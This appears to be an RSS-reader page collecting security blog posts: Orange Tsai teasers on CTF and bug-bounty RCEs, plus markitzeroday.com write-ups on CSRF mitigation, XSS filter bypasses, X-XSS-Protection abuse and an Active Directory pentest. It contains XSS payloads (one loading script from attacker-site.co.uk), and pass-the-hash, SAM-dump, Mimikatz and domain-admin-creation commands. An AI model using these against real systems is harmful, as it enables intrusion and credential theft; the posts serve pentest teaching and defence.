🔒
There are new articles available, click to refresh the page.
✇ Orange

Remote Code Execution through GDB Remote Debugging Protocol

By: [email protected] (Orange Tsai)
在準備 DEFCON CTF 時額外想到的小玩具, 很多人使用 GDB remote debugging 時為了方便遠端使用,會將 port 綁在 0.0.0.0 上使得攻擊者可以連接上做一些事情 至於可以做哪些事情,不來個遠端代碼執行就不好玩了XD 大部分的工作都基於 Turning arbitrary GDBserver sessions into RCE 這篇文章, 修改部分則是加上 arm 及 x64 的支援以及把 code 改好看點....XD 比較 tricky 的部分則是 GDB 在 extended-remote 後,GDB 預設的處理器架構會是 i386 如果遠端的處理器架構非 x86 的架構下會失敗,所以必須用 set architecture 指定處理器架構 (原文章因為都在 x86 架構下所以沒這個問題XD) 但是在 run 之前無法知道所處的處理器架構
✇ Orange

AIS3 Final CTF Web Writeup (Race Condition & one-byte off SQL Injection)

By: [email protected] (Orange Tsai)
這次為了 AIS3 Final CTF 所出的一道題目,這題在這以初新者導向中的比賽中相對難, 不過其中的觀念很有趣,在解題中什麼都給你了就是找不到洞但經人一解釋就會有豁然開朗覺得為什麼自己沒想到的感覺 在做 Web 攻擊、滲透滿多時候思路不能太正派、太直觀,要歪一點、要 "猥瑣" 一點XD 純粹 code review 直接上 code (可以自己先嘗試一下找不找的到洞XD) .gist-file .gist-data {max-height: 500px;} 漏洞一 Race Condition 預設註冊的使用者都是會被放進 locks 表中鎖起來的, 但是只要在註冊中,帳號尚未被新增進 locks 表時(111 & 112 行) 馬上登入的話, 登入檢查是否被鎖住的限制就可以繞過了! 漏洞二 one-byte off SQL
✇ Orange

Google & Facebook Bug Bounty GET

By: [email protected] (Orange Tsai)
先說這篇純粹炫耀文xD 暨 2013 年 Yahoo 開始有 Bug Bounty 那時搶個流行找了兩個漏洞回報 Yahoo 然後 Yahoo Bug Bounty Part 1 - 台灣 Yahoo Blog 任意檔案下載漏洞 Yahoo Bug Bounty Part 2 - *.login.yahoo.com 遠端代碼執行漏洞 就沒有然後了。之後就變成電競選手在打 CTF 了 直到今年年中,想說至少把幾間大公司的漏洞回報榜都留個名字就開始繼續挖洞 不過實際下去挖掘的時候發現差異滿大的,好挖好找嚴重性大的漏洞都已經被找走 感覺挖漏洞的藍海時代已經過惹 現在要當獎金獵人只能往比較前端跟設計上的小疏失挖掘,賺不到甚麼大錢XD 花了一點時間 survey 歷年出過的一些漏洞以及前端相關的一些攻擊手法 找到了個 Google 某官方的 CSRF 導致個人資訊
✇ Orange

HITCON CTF 2015 Quals & Final 心得備份

By: [email protected] (Orange Tsai)
當初好像沒留底稿只發布在 Facebook 跟烏雲 今天睡醒發現又有人在轉貼這篇,想說留個備份好了XD Facebook 連結 Wooyun 知識庫連結 HITCON KnowledgeBase 連結 ---------- 決賽 Attack & Defense 也出了一道 Web 題目 0ops 成員 5alt 也寫了一篇筆記 HITCON CTF 2015 Final Webful Writeup 寫的真棒XD 看得我自己心癢癢都想寫一篇來解釋各個洞為什麼要這樣設計了XD 出 Final 時候本意就是要把環境模擬成真實環境,讓平常 Web 狗的各種猥瑣流可以得心應手而不是淪為解題形式在實戰中派不上用場   除了各個 API 接口的互相影響 單點淪陷 = 全部淪陷 外 還有模擬 Discuz UC_KEY 的應用,SECRET_KEY 洩漏的各種利用方式順便防止 Replay
✇ Orange

Uber 遠端代碼執行- Uber.com Remote Code Execution via Flask Jinja2 Template Injection

By: [email protected] (Orange Tsai)
好久沒 po 文了XD 幾天前,Uber 公佈了 Bug Bounty 計畫,從  Hackerone 上看到獎金不低,最少的 XSS / CSRF 都有 3000 美金起就跳下來看一下有什麼好玩的XD 從官方公佈的技術細節發現 Uber 主要網站是以 Python Flask 以及 NodeJS 為架構,所以在尋找漏洞的時候自然會比較偏以測試這兩種 Framework 的漏洞為主! Uber 網站在進行一些動作如修改電話、姓名時,會以寄信及簡訊的方式告知使用者帳號進行了變更,在某次動作後發現 Uber 寄過來的信如下圖,怎麼名字會多個 "2" XDDDD 往前追查原因才發現進入點是在 Riders.uber.com,Riders.uber.com 為修改個人資料以及顯示帳單、行程行程的地方,在修改的姓名中,使用了 {{ 1+1 }} 這個 payload
✇ Orange

How I Hacked Facebook, and Found Someone's Backdoor Script

By: [email protected] (Orange Tsai)
千呼萬喚始出來XD How I Hacked Facebook, and Found Someone's Backdoor Script (English Version) 滲透 Facebook 的思路與發現 (中文版本) 看來再找一個 Google 的 RCE 就可以把各大公司的 RCE 系列給蒐集全了XD
✇ Orange

HITCON 2016 投影片 - Bug Bounty 獎金獵人甘苦談 那些年我回報過的漏洞

By: [email protected] (Orange Tsai)
This is my talk about being a Bug Bounty Hunter at HITCON Community 2016 It shared some of my views on finding bugs and some case studies, such as Facebook Remote Code Execution... more details Uber Remote Code Execution... more details developer.apple.com Remote Code Execution abs.apple.com Remote Code Execution b.login.yahoo.com Remote Code Execution... more details eBay SQL Injection
✇ Orange

Collection of CTF Web Challenges I made

By: [email protected] (Orange Tsai)
把出過的 CTF Web 題都整理上 GitHub 惹,包括原始碼、解法、所用到技術、散落在外的 Write ups 等等 This is the repository of CTF Web challenges I made. It contains challs's source code, solution, write ups and some idea explanation. Hope you will like it :) https://github.com/orangetw/My-CTF-Web-Challenges
✇ Orange

[隨筆] Java Web 漏洞生態食物鏈

By: [email protected] (Orange Tsai)
本來這篇文章叫做 HITCON CTF 2016 初賽出題小記的,可是擺著擺著就兩個月過去惹~ 轉來寫寫跟 Java 有關的東西XD 關於序今年五六月的時候,看到某個曾經很多人用但快停止維護的 Java Web Framework 弱點的修補方式感覺還有戲所以開始追一下原始碼挖 0-Day,順便整理一下 Java Web 相關弱點 — 😊覺得有趣。 通常自己在外面演講時對於 Web Security 的分類中大致可分為三個世界: File-Based 的世界,一個檔案對應一個入口點如經典的 ASP, PHP, ASPX 等 Route-Based 的世界,一個路徑對應一組函數(功能)如經典的 Rails, NodeJS, Django 等 Java 的世界,Java 的世界極其複雜自成一格獨立討論 當然三種分類並不是獨立開來,如常見 PHP MVC 用 Rewrite 將
✇ Orange

GitHub Enterprise SQL Injection

By: [email protected] (Orange Tsai)
Before GitHub Enterprise is the on-premises version of GitHub.com that you can deploy a whole GitHub service in your private network for businesses. You can get 45-days free trial and download the VM from enterprise.github.com. After you deployed, you will see like bellow: Now, I have all the GitHub environment in a VM. It's interesting, so I decided to look deeper into VM :P
✇ markitzeroday.com

CSRF Mitigation for AJAX Requests

To start with, a quick recap on what Cross-Site Request Forgery is:

  1. User is logged into their bank’s website: https://example.com.
  2. The bank website has a “money transfer” function: https://example.com/manage_money/transfer.do.
  3. The “money transfer” function accepts the following POST parameters: toAccount and amount.
  4. While logged into https://example.com the user receives an email from a person they think is their friend.
  5. The user clicks the link inside the email to access a cat video: https://attacker-site.co.uk/cats.htm.
  6. cats.htm whilst displaying said cat video, also makes a client-side AJAX request to https://example.com/manage_money/transfer.do POSTing the values toAccount=1234 and amount=100 transferring £100 to the attacker’s account from the victim.

Quick POC here that only POSTs to example.com and not your bank. Hopefully your bank already has CSRF mitigation in place. View source, developer console and Burp or Fiddler are your friends.

There’s a common misconception that websites can’t make cross-domain requests to other domains due to the Same Origin Policy. This could be due to the following being displayed within the browser console:

CORS Error

However, this is not the case. The request has been made, the browser message is telling you that the current origin (https://attacker-site.co.uk) simply cannot read any of the returned data from the cross-domain request. However, unlike an XSS attack, it doesn’t need to. The request has been made, and because the user is logged into the bank so therefore has a session cookie, this session cookie has been passed to the bank site authorising the transaction.

Quick Demo

Simulate the bank issuing a session cookie by creating our own in the browser:

Cookie Setup

Note we’ll set the Secure flag and HTTPOnly flags to show these have no effect on CSRF.

Visit the website:

Attacker Site CATS!

The following request is sent, note our session cookie is included:

Burp Request

Therefore as far as the web application is concerned, this is a legitimate request from the user to transfer the money despite the browser returning Cross-Origin Request Blocked. Only the response is blocked, not the original request.

AJAX Mitigation

If the target application has no CSRF mitigation in place, the above works for both AJAX requests and traditional form POSTs. This can be mitigated using the traditionally recommended Synchronizer Token Pattern. This involves creating a random, unpredictable token (in addition to the session token held in the cookie) and storing this server-side as a session variable. When a POST is made, this anti-CSRF token is also sent, but using any mechanism apart from cookies. This means that the anti-CSRF token will not be automatically included from the browser should the user follow a dodgy link that makes its own cross-domain request. CSRF averted.

But what if there was another way? One little known way is to include a custom header, such as X-Requested-With, as I answered here.

Basically:

  1. Set the custom header in every AJAX request that changes server-side state of the application. e.g. X-Requested-With: XmlHttpRequest.
  2. In each server-side method handler, ensure a CSRF check function is called.
  3. The CSRF function examines the HTTP request and checks that X-Requested-With: XmlHttpRequest is present as a header.
  4. If it is, it is allowed. If it isn’t, send an HTTP 403 response and log this server-side.

Many JavaScript frameworks such as JQuery will automatically send this header along with any AJAX requests. This header cannot be sent cross-domain:

  1. Any attempt to do so with a modern browser will trigger a CORS preflight request.
  2. Older browsers (think IE 8 and 9) can send cross-domain requests, but custom headers are not supported at all.
  3. Very old browsers cannot send cross-domain AJAX requests at all.

What is a Preflight?

So referring to the above old browsers couldn’t make cross-domain requests at all via AJAX. Therefore, you may get an old website that does check for a custom header server-side so that it knows it is an AJAX request. Now, the web is developed on the basis of “no breaking changes”. Therefore any new technologies introduced into the browser should not force websites to have to update themselves to continue working (why not visit the World Wide Web - apparently the world’s first website). This goes for functionality as well as security.

Therefore, suddenly allowing browsers to send cross-domain headers could break security if a site relies on this for CSRF mitigation. This scenario covers both points 2 and 3.

So that leaves 1, CORS (Cross-Origin Resource Sharing). CORS is a mechanism that weakens security. Its aim is to allow sites that trust one another to break the Same Origin Policy and read each others responses. e.g. api.example.org might allow example.org to make a cross-domain request and read the response in the browser, using the user’s session cookie as authorisation.

In a nutshell CORS does not prevent anything that used to be possible from happening. An example is a cross domain post using <form method="post"> has always been allowed, so therefore CORS allows any AJAX request that results in a previously possible HTTP request to be made, without a preflight request. This is because this has always been possible on the web and allowing AJAX to do this as well does not introduce any extra risk. However, a request with custom headers causes the browser to automatically send a request to the endpoint using the OPTIONS verb. If the server-side application recognises the OPTIONS request (i.e. it is CORS aware), it will reply with a header showing which headers will be allowed from the calling domain.

Here you can see the attempt to send X-Requested-With in a cross-domain POST results in an OPTIONS request requesting this header be allowed, rather than the actual request. This is the preflight.

OPTIONS verb

If the server-side is not explicitly configured to allow this (i.e. no Access-Control-Allow-Origin to allow the domain and no Access-Control-Allow-Headers to allow the custom header):

OPTIONS response

The header is not allowed because our example.com domain is not configured for CORS.

Therefore if CORS is not allowing the attacker’s domain to send extra headers, this mitigates CSRF.

Will This Work?

What To Look For When Pentesting

The above will only work if the server-side application is verifying that the custom header X-Requested-With is received in the request. As a pentester you should verify that all potentially discovered CSRF vulnerabilities are actually exploitable. Burp Suite allows this via right clicking an item then clicking Engagement tools > Create CSRF PoC. This may result in two things:

  1. If you weren’t aware of the above, you may find a POST request that first appeared vulnerable to CSRF (due to no tokens) however isn’t due to header checking.
  2. If, after having read this post, you find that an AJAX request is sending X-Requested-With: XmlHttpRequest you may find that removing this header still causes the “unsafe” action to take place server-side, therefore the request is vulnerable.

What To Do As A Developer

This may be a good short-cut if your server-side language of choice does not support server-side variables or if you do not want the extra overhead of storing an additional token per user session. However, make sure that the presence of the HTTP request header is verified for every handler that makes a change of state to your application. Aka, “unsafe” requests as defined by the RFC.

Remember, this only works for AJAX requests. If your application has to fall-back to full HTML requests if JavaScript is disabled, then this will not work for you. Custom headers cannot be sent via <form> tags.

Conclusion

This is a useful, easy to implement mitigation for CSRF. Although an attacker can easily add a custom header themselves (e.g. using Burp Suite), they can only do this to their own requests, not those of the victim as required in a client-side attack. There were vulnerabilities in Flash that allowed a custom-header to be added to a cross-domain request to another attacker’s site that set crossdomain.xml. Unlike HTML, Flash requires a crossdomain.xml file for any request, even those that are write only, such as CSRF. The trick here was for the attacker to issue a 307 HTTP redirect to redirect from their second attacker domain to the victim website. The bug in Flash carried over the custom header from the original request. However, as Flash is moribund, and this was a bug, I would say it is generally safe for most sites to rely on the presence of the header as a mitigation. However, if the risk appetite is low for the application in question, go with token mitigation instead of or as well: Defence-In-Depth.

Note that the Flash bug was fixed back in 2015.

✇ markitzeroday.com

XSS Without Dots

A site that I discovered was echoing everything on the query string and POST data into a <div> tag.

e.g. example.php?monkey=banana gave

<div>
monkey => banana
</div>

I’m guessing this was for debugging reasons. So an easy XSS with

example.php?<script>alert(1)</script> gave

<div>
<script>alert(1)</script>
</div>

So I thought rather than just echoing 1 or xss I’d output the current cookie as a simple POC.

However, things weren’t as they seemed:

example.php?<script>alert(document.cookie)</script> gave

<div>
<script>alert(document_cookie)</script>
</div>

Underscore!? Oh well, I’ll just use an accessor to access the property:

example.php?<script>alert(document['cookie'])</script>. Nope:

<div>
<script>alert(document[
</div>

So thought the answer was to host the script on a remote domain:

example.php?<script src="//attacker-site.co.uk/sc.js"></script>:

<div>
<script_src="//attacker-site_co_uk/sc_js"></script>
</div>

Doh! Two problems….

A quick Google gave the answer to use %0C for the space:

example.php?<script%0Csrc="//attacker-site.co.uk/sc.js"></script>

And then to get the dots, we can simply HTML encode them as we are in an HTML context:

example.php?<script%0Csrc="//attacker-site&#46;co&#46;uk/sc&#46;js"></script>

which percent encoded is of course

example.php?<script%0Csrc="//attacker-site%26%2346%3bco%26%2346%3buk/sc%26%2346%3bjs"></script>

And this delivered the goods:

<div>
<script src="//attacker-site&#46;co&#46;uk/sc&#46;js"></script>
</div>

which the browser reads as

<script src="//attacker-site.co.uk/sc.js"></script>

And dutifully delivers our message box:

Alert

✇ Orange

How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!

By: [email protected] (Orange Tsai)
Hi, it’s been a long time since my last blog post. In the past few months, I spent lots of time preparing for the talk of Black Hat USA 2017 and DEF CON 25. Being a Black Hat and DEFCON speaker is part of my life goal ever. This is also my first English talk in such formal conferences. It's really a memorable experience :P Thanks Review Boards for the acceptance. This post is a simple case
✇ markitzeroday.com

ASP.NET Request Validation Bypass

…and why you should report it (maybe).

This post is regarding the .NET Request Validation vulnerability, as described here. Note that this is nothing new, but I am still finding the issue prevalent on .NET sites in 2017.

Request Validation is an ASP.NET input filter.

This is designed to protect applications against XSS, even though Microsoft themselves state that it is not secure:

Even if you’re using request validation, you should HTML-encode text that you get from users before you display it on a page.

To me, that seems a bit mad. If you are providing users of your framework with functionality that mitigates XSS, why do users then have to do the one thing that mitigates XSS themselves?

Microsoft should have ensured that all .NET controls properly output things HTML encoded. For example, unless the developer manually output encodes the data in the following example then XSS will be introduced.

<asp:Repeater ID="Repeater2" runat="server">
  <ItemTemplate>
    <%# Eval("YourField") %>
  </ItemTemplate>
</asp:Repeater>

The <%: syntax introduced in .NET 4 was a good move for automatic HTML encoding, although it should have existed from the start.

Now to summarise, normally ASP.NET Request Validation blocks any HTTP request that appears to contain tags. e.g.

example.com/?foo=<b> would result in A potentially dangerous Request.QueryString value was detected from the client error, presented on a nice Yellow Screen of Death.

This is to prevent a user from inserting a <script> tag into user input, or from trying some other form such as <svg onload="alert(1)" />.

However, the flaw in this is that <%tag is allowed. This is a quirky tag that only works in Internet Explorer 9. But ironically not quirks mode, it requires IE9 standards mode so the top of the page must contain this Edit: It works in either mode, however if the page is in quirks mode then it requires user interaction (like mouseover). Example, the existing page can seen to be in quirks mode as it contains the following type definition and meta tag (although in tests only the meta tag seems to be required):

<!doctype html>
<meta http-equiv="X-UA-Compatible" content="IE=Edge">

I’ve setup an example here that you can try in IE9. The code is as follows:

<!doctype html>
<html>
<head>
	<meta http-equiv="X-UA-Compatible" content="IE=Edge">
</head>
<body>

	<%tag onmouseover="alert('markitzeroday.com')">Move mouse here

</body>
</html>

Loading your target page in Internet Explorer 9 and then viewing developer tools will show you whether the page is rendered in quirks mode.

Moving the mouse over the text gives our favourite notification from a computer ever - that which proves JavaScript execution has taken place:

XSS Proof

Edit: Actually this does work in quirks mode too using a CSS vector and no document type declaration:

<html>
<head>
</head>
<body>

        <%tag style="xss:expression(alert('markitzeroday.com'))">And you don't even have to mouseover

</body>
</html>

Example Warning: This is a trap, and you may need to hold escape to well… escape.

Now, you should report this in your pentest or bug bounty reports if you can prove JavaScript execution in IE9, either stored or reflected. Unfortunately it is not enough to bypass Request Validation in itself as XSS is an output vulnerability, not an input one.

Note that it is important that this is reported, even though it affects Internet Explorer 9 only. The reasons are as follows:

  • Some organisations are “stuck” on old versions of Internet Explorer for compatibility reasons. Their IT department will not upgrade the browsers network wide as a piece of software bought in 2011 for £150,000 will not run on anything else.
  • By getting XSS with one browser version, you are proving that adequate output encoding is not in place. This shows the application is vulnerable should it also use data from other sources. e.g. User input from a database shared with a non ASP.NET app, or an app that is written properly as not to rely on ASP.NET Request Validation.
    • Granted you can only test inputs from your “in-scope” applications and prove that those inputs have a vulnerable sink when output elsewhere, although chances are that if one part of the application is vulnerable then other parts will be and you can alert your client to this possibility quite literally.

Note also that Request Validation inhibits functionality. Much like my post on functional flaws vs security flaws, preventing a user from entering certain characters and then resolving this by issuing an HTTP 500 response results in a broken app. If such character sequences are not allowed, you should alert the user in a friendly way and give them chance to fix it first, even if this is only client-side validation. Also any automated processes that may include <stuff that it POSTs or GETs to your application may unexpectedly fail.

The thing that Microsoft got wrong with Request Validation is that XSS it an output problem, not an input problem. The Microsoft article linked above is still confused about this:

If you disable request validation, you must check the user input yourself for dangerous HTML or JavaScript.

Of course, if you want a highly secure site as your risk appetite is low, then do validate user input. Don’t let non alphanumeric characters be entered if they are not needed. However, the primary mitigation for XSS is output encoding. This is the act of changing characters like < to &lt;. Then it doesn’t matter if this is output to your page as the browser won’t execute it and therefore no XSS.

So as a pentester, report it if IE9 shows the alert, even if IE9 should be killed with fire. As a developer, turn Request Validation off and develop your application to HTML encode everywhere (don’t output into JavaScript directly - just don’t). If you need “extra” security, prevent non alphanumerics from being inserted into fields yourself through server-side validation.

✇ Orange

PHP CVE-2018-5711 - Hanging Websites by a Harmful GIF

By: [email protected] (Orange Tsai)
Author: Orange Tsai(@orange_8361) from DEVCORE Recently, I reviewed several Web frameworks and language implementations, and found some vulnerabilities. This is an simple and interesting case, and seems easy to exploit in real world! Affected All PHP version PHP 5 < 5.6.33 PHP 7.0 < 7.0.27 PHP 7.1 < 7.1.13 PHP 7.2 < 7.2.1 Vulnerability Details The vulnerability is on the file ext/gd/
✇ markitzeroday.com

Hidden XSS

On a web test once I was having trouble finding any instances of cross-site scripting, which is very unusual.

However, after scanning the site with nikto, some interesting things came up:

$ nikto -h rob-sec-1.com
- ***** RFIURL is not defined in nikto.conf--no RFI tests will run *****
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          193.70.91.5
+ Target Hostname:    rob-sec-1.com
+ Target Port:        80
+ Start Time:         2018-02-03 15:37:18 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie v created without the httponly flag
+ Root page / redirects to: /?node_id=V0lMTCB5b3UgYmUgcmlja3JvbGxlZD8%3D
+ Server leaks inodes via ETags, header found with file /css, inode: 0x109c8, size: 0x56, mtime: 0x543795d00f180;56450719f9b80
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /css: This might be interesting...
+ OSVDB-3092: /test/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 4197 items checked: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2018-02-03 15:40:15 (GMT0) (177 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Particularly this:

+ OSVDB-3092: /test/: This might be interesting...

So I navigated to /test/ and saw this at the top of the page:

Test URL in browser

So the page had the usual content, however, there appeared to be some odd text at the top, and because it said NULL this struck me as some debug output that the developers had left in on the production site.

So to find out if this debug output is populated by any query string parameter, we can use wfuzz.

First we need to determine how many bytes come back from the page on a normal request:

$curl 'http://rob-sec-1.com/test/?' 1>/dev/null
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    53  100    53    0     0     53      0  0:00:01 --:--:--  0:00:01   289

Here we can see that this is 53. From there, we can configure wfuzz to try different parameter names and then look for any responses that have a size other than 53 characters. Here we’ll use dirb’s common.txt list as a starting point:

$ wfuzz -w /usr/share/wordlists/dirb/common.txt --hh 53 'http://rob-sec-1.com/test/?FUZZ=<script>alert("xss")</script>'
********************************************************
* Wfuzz 2.2.3 - The Web Fuzzer                         *
********************************************************

Target: HTTP://rob-sec-1.com/test/?FUZZ=<script>alert("xss")</script>
Total requests: 4614

==================================================================
ID	Response   Lines      Word         Chars          Payload    
==================================================================

02127:  C=200      9 L	       8 W	     84 Ch	  "item"

Total time: 14.93025
Processed Requests: 4614
Filtered Requests: 4613
Requests/sec.: 309.0369

Well, whaddya know, looks like we’ve found the parameter!

Will Smith

Copying /test/?item=<script>alert("xss")</script> into Firefox gives us our alert:

xss

✇ markitzeroday.com

How to Use X-XSS-Protection for Evil

Two important headers that can mitigate XSS are:

  • X-XSS-Protection
  • Content-Security-Policy

So what is the difference?

Well browsers such as Internet Explorer and Chrome include an “XSS auditor” which attempts to help prevent reflected XSS from firing. The first header controls that within the browser.

Details are here, but basically the four supported options are:

X-XSS-Protection: 0
X-XSS-Protection: 1
X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; report=<reporting-uri>

It should be noted that the auditor is active by default, unless the user (or their administrator) has disabled it.

Therefore,

X-XSS-Protection: 1

will turn it back on for the user.

The second header, Content Security Policy, is a newer header that controls where an HTML page can load its content from, including JavaScript. Basically including anything other than unsafe-inline as a directive means that injected JavaScript into the page will not execute, and can mitigate both reflected and stored XSS. CSP is a much larger topic than I’m going to cover here, however, detailed information regarding the header can be found here.

What I wanted to show you was the difference between specifying block, and either not including the header at all (which therefore will take on the setting in the browser) or specifying 1 without block. Also, for good measure I will show you the Content Security Policy mitigation for cross-site scripting.

I will show you a way that if a site has specified X-XSS-Protection without block, how this can be abused.

The linked page has the following code in it:

<script>document.write("one potato")</script><br />
<script>document.write("two potato")</script><br />
three potato

Now if we link straight there from the current page you’re reading, the two script blocks should fire:

normal

To demonstrate how the XSS auditors work, let’s imagine we tried to inject that script into the page ourselves by appending this query string:

?xss1=<script>document.write("one potato")</script>&xss2=<script>document.write("two potato")</script>

Note that the following will not work from Firefox, as at the time of writing Firefox doesn’t include any XSS auditor and therefore is very open to reflected XSS should the visited site be vulnerable. There is the add-on noscript that you can use to protect yourself, should Firefox be your browser of choice. Note the following has been tested in Chrome 64 only. I will also enable your XSS filter in supported browsers by adding X-XSS-Protection: 1 to the output.

injected

Note how the browser now thinks that the two script blocks have been injected, and therefore blocks them and only outputs the plain HTML. View source to see the code if you don’t believe it is still there.

Viewing F12 developer tools shows us the auditor has done its stuff:

Chrome F12

Viewing source shows us which script has been blocked in red:

Source code

Now what could an attacker do to abuse the XSS auditor? Well they could manipulate the page to prevent scripts of their choosing to be blocked.

?xss2=<script>document.write("two potato")</script>

abused

Viewing the source shows the attacker has just blocked what they wanted by specifying the source code in the URl:

abused source code

Of course, editing their own link is fruitless, they would have to be passing the link onto their victim(s) in some way by sending it to via email, Facebook, Skype, etc …

What are the risks in this? Well The Web Application Hacker’s Handbook puts it better than I could:

web app hackers handbook quote

So, how can we defend against this? Well, you guessed it, the block directive:

X-XSS-Protection: 1; mode=block

So let’s try this again with that specified:

abused but blocked

So by specifying block we can prevent an attacker from crafting links that neutralise our existing script!

So in summary it is always good to specify block as by default XSS auditors only attempt to block what they think is being injected, which might not actually be the evil script itself.

Content Security Policy then?

Just to demo the difference, if we output a CSP header that prevents inline script and don’t attempt to inject anything:

CSP example image

Chrome shows us this is solely down to Content Security Policy:

csp chrome error

To get round this as site developers we can either specify the SHA-256 hash as described in our CSP, or simply move our code to a separate .js file as long as we white-list self in our policy. Any attacker injecting inline script will be foiled. Of course the problem with Content Security Policy is that it still seems to be an after-thought and trying to come up with a policy that fits an existing site is very hard unless your site is pretty much static. However, it is a great mitigation if done properly. Any weaknesses in the policy though may be ripe for exploitation. Hopefully I’ll have a post on that in the future if I come across it in any engagements.

*Yeh yeh, you’re not using X-XSS-Protection for evil, but lack of block of course, and if no-one has messed with the browser settings it is as though X-XSS-Protection: 1 has been output.

✇ markitzeroday.com

Gaining Domain Admin from Outside Active Directory

…or why you should ensure all Windows machines are domain joined.

This is my first non-web post on my blog. I’m traditionally a web developer, and that is where my first interest in infosec came from. However, since I have managed to branch into penetration testing, Active Directory testing has become my favourite type of penetration test.

This post is regarding an internal network test I undertook some years back. This client’s network is a tough nut to crack, and one I’ve tested before so I was kind of apprehensive of going back to do this test for them in case I came away without having “hacked in”. We had only just managed it the previous time.

The first thing I run on an internal is the Responder tool. This will grab Windows hashes from LLMNR or NetBIOS requests on the local subnet. However, this client was wise to this and had LLMNR & NetBIOS requests disabled. Despite already knowing this fact from the previous engagement, one of the things I learned during my OSCP course was to always try the easy things first - there’s no point in breaking in through a skylight if the front door is open.

So I ran Responder, and I was surprised to see the following hash captured:

reponder

Note of course, that I would never reveal client confidential information on my blog, therefore everything you see here is anonymised and recreated in the lab with details changed.

Here we can see the host 172.16.157.133 has sent us the NETNTLMv2 hash for the account FRONTDESK.

Checking this host’s NetBIOS information with Crack Map Exec (other tools are available), we can check whether this is a local account hash. If it is, the “domain” part of the username:

[SMBv2] NTLMv2-SSP Username : 2-FD-87622\FRONTDESK

i.e. 2-FD-87622 should match the host’s NetBIOS name if this is the case. Looking up the IP with CME we can see the name of the host matches:

netbios

So the next port of call we try to crack this hash and gain the plaintext password. Hashcat was loaded against rockyou.txt and rules, and quickly cracked the password.

hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

hashcat

Now we have a set of credentials for the front desk machine. Hitting the machine again with CME but this time passing the cracked credentials:

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth

admin on own machine

We can see Pwn3d! in the output showing us this is a local administrator account. This means we have the privileges required to dump the local password hashes:

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth --sam

SAM hashes

Note we can see

FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::

This time we are seeing the NTLM hash of the password, rather than the NETNTLMv2 “challenge/response” hash that Responder caught earlier. Responder catches hashes over the wire, and these are different to the format that Windows stores in the SAM.

The next step was to try the local administrator hash and spray it against the client’s server range. Note that we don’t even have to crack this administrator password, we can simply “pass-the-hash”:

cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth

admin password reuse

We can only pass-the-hash using the stored NTLM format, not the NETNTLMv2 network format (unless you look to execute an “SMB relay” attack instead).

To our surprise, it got a hit, the local administrator password had been reused on the STEWIE machine. Querying this host’s NetBIOS info:

$ cme smb 172.16.157.134 
SMB         172.16.157.134  445    STEWIE           
[*] Windows Server 2008 R2 Foundation 7600 x64 (name:STEWIE) (domain:MACFARLANE)
(signing:False) (SMBv1:True)

We can see it is a member of the MACFARLANE domain, the main domain of the client’s Active Directory.

So the non-domain machine had a local administrator password which was reused on the internal servers. We can now use Metasploit to PsExec onto the machine, using the NTLM as the password which will cause Metasploit to pass-the-hash.

metasploit options

Once ran, our shell is gained:

ps exec shell

We can load the Mimikatz module and read Windows memory to find passwords:

mimikatz

Looks like we have the DA (Domain Admin) account details. And to finish off, we use CME to execute commands on the Domain Controller to add ourselves as a DA (purely for a POC, in real life or to remain more stealthy we could just use the discovered account).

cme smb 172.16.157.135 -u administrator -p 'October17' -x 'net user markitzeroda hackersPassword! /add /domain /y && net group "domain admins" markitzeroda /add'

add da

Note the use of the undocumented /y function to suppress the prompt Windows gives you for adding a password longer than 14 characters.

A screenshot of Remote Desktop to the Domain Controller can go into the report as proof of exploitation:

da proof

So if this front desk machine had been joined to the domain, it would have had LLMNR disabled (from their Group Policy setting) and we wouldn’t have gained the initial access to it and leveraged its secrets in order to compromise the whole domain. Of course there are other mitigations such as using LAPS to manage local administrator passwords and setting FilterAdministratorToken to prevent SMB logins using the local RID 500 account (great post on this here).

✇ Orange

Pwn a CTF Platform with Java JRMP Gadget

By: [email protected] (Orange Tsai)
打 CTF 打膩覺得沒啥新鮮感嗎,來試試打掉整個 CTF 計分板吧! 前幾個月,剛好看到某個大型 CTF 比賽開放註冊,但不允許台灣參加有點難過 :(看著官網最下面發現是 FlappyPig 所主辦,又附上 GitHub 原始碼 秉持著練習 Java code review 的精神就 git clone 下來找洞了! (以下測試皆在 FlappyPig 的允許下友情測試,漏洞回報官方後也經過同意發文)在有原始碼的狀況下進行 Java 的 code review 第一件事當然是去了解第三方 Libraries 的相依性,關於 Java 的生態系我也在幾年前的文章小小分享過,當有個底層函式庫出現問題時是整個上層的應用皆受影響!從 pom.xml 觀察發現用了Spring Framework 4.2.4從版本來看似乎很棒沒什麼重大問題 Mybatis 3.3.1一個 Java ORM
❌